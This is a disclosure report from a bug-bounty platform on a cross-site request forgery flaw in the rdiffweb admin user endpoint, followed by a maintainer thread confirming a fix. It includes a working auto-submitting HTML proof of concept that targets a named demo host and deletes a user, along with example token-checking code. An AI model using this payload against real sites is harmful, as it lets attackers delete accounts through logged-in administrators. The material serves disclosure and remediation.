Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb

Valid

Reported on

Sep 11th 2021


✍️ Description

Hello dear Rdiffweb team.

I found a CSRF vulnerability on the following endpoint that allows attackers to delete users with PoC.html.

🕵️‍♂️ Proof of Concept

  1. A user with the right privileges should be logged in, in Firefox or Safari.

  2. The user goes to a website that contains PoC.html.

  3. After visiting the attacker's website, the user with username aaaa will be deleted.

// PoC.html

<html>
  <body>
    <!-- hide the PoC URL from the address bar / history -->
    <script>history.pushState('', '', '/')</script>
    <!-- cross-site POST to the user-management endpoint; no anti-CSRF token is required -->
    <form action="https://rdiffweb-demo.ikus-soft.com/admin/users" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="username" value="aaaa" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- submit automatically as soon as the page loads -->
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Also, an attacker can send multiple requests with the help of iframes.

Fix

I just want to suggest that you set a CSRF token for this form.
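As an added illustration of the suggested fix (example code, not rdiffweb's own implementation or anything from this report): a plain-Python model of the POST /admin/users handler that binds a random token to the session, embeds it in the delete form, and rejects any request that does not echo it back. The in-memory session dict, the `users` set and all function names are assumptions made for the example.

```python
import hmac
import secrets
from urllib.parse import parse_qs


def issue_csrf_token(session):
    """Bind a fresh, unguessable token to the (hypothetical) session dict."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def render_delete_form(session, username):
    """Server-rendered form: the token travels as a hidden field the
    attacker's cross-site page cannot read (same-origin policy)."""
    token = session.get("csrf_token") or issue_csrf_token(session)
    return (
        '<form action="/admin/users" method="POST">'
        '<input type="hidden" name="action" value="delete" />'
        f'<input type="hidden" name="username" value="{username}" />'
        f'<input type="hidden" name="csrf_token" value="{token}" />'
        '<input type="submit" value="Delete" /></form>'
    )


def csrf_token_valid(session, submitted):
    """Constant-time comparison; missing session token or field fails closed."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def admin_users_post(session, body, users):
    """Hardened handler for POST /admin/users. Returns (status, message).
    `body` is the raw urlencoded form body, `users` a mutable set of names."""
    form = {k: v[0] for k, v in parse_qs(body).items()}
    if not csrf_token_valid(session, form.get("csrf_token")):
        # This is exactly where the PoC.html request above is stopped:
        # it carries action/username but no token.
        return 403, "invalid or missing CSRF token"
    # Rotate after use so a token that leaks cannot be replayed.
    issue_csrf_token(session)
    if form.get("action") == "delete":
        username = form.get("username", "")
        if username not in users:
            return 404, "no such user"
        users.discard(username)
        return 200, f"deleted {username}"
    return 400, "unknown action"
```

A SameSite=Lax/Strict attribute on the session cookie is a useful second layer, but the token check is what makes the endpoint safe regardless of browser behaviour.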

Ziding Zhang
3 months ago

Admin


Hey amammad, I've opened a PR on the repo asking for a security policy with email.

amammad
3 months ago

Researcher


@admin Hey Zi,

The maintainer already put their own email on your pull request.

https://github.com/ikus060/rdiffweb/pull/73

Ziding Zhang
2 months ago

Admin


Hey amammad, I've updated the PR for him. Thanks.

amammad
2 months ago

Researcher


@admin hey admin

They already put their email in 25 days ago!!!

We have contacted a member of the ikus060/rdiffweb team and are waiting to hear back 2 months ago
Jamie Slome
2 months ago

Admin


Sorted! ♥️

Patrik Dufresne validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrik Dufresne confirmed that a fix has been merged on fc257f 2 months ago
The fix bounty has been dropped
Patrik Dufresne
2 months ago

Maintainer


Changes are made and released as 2.3.5.

amammad
2 months ago

Researcher


There are other reports for other endpoints, please validate them too.

You can see them in the reports section.

Patrik Dufresne
2 months ago

Maintainer


@amammad

I've added CSRF everywhere applicable. I'm not sure if I've missed any endpoint.

amammad
2 months ago

Researcher


Can I ask, did you check these reports?

https://www.huntr.dev/bounties/5ee61635-4a57-41f6-9536-a07737e99db2/
https://www.huntr.dev/bounties/74c976cf-cf31-4a51-992b-45b8c488c4f2/
https://www.huntr.dev/bounties/b558dfb2-38a4-4ea7-a53f-6808065337aa/
https://www.huntr.dev/bounties/740ac468-47b3-4937-98ef-01e8e5e1382b/

I tested all parts of the application and found the endpoints that don't have any CSRF protection.

amammad
2 months ago

Researcher


The dates of all these reports are the same.

amammad
2 months ago

Researcher


I mean that I filed one report for every endpoint that was vulnerable to CSRF.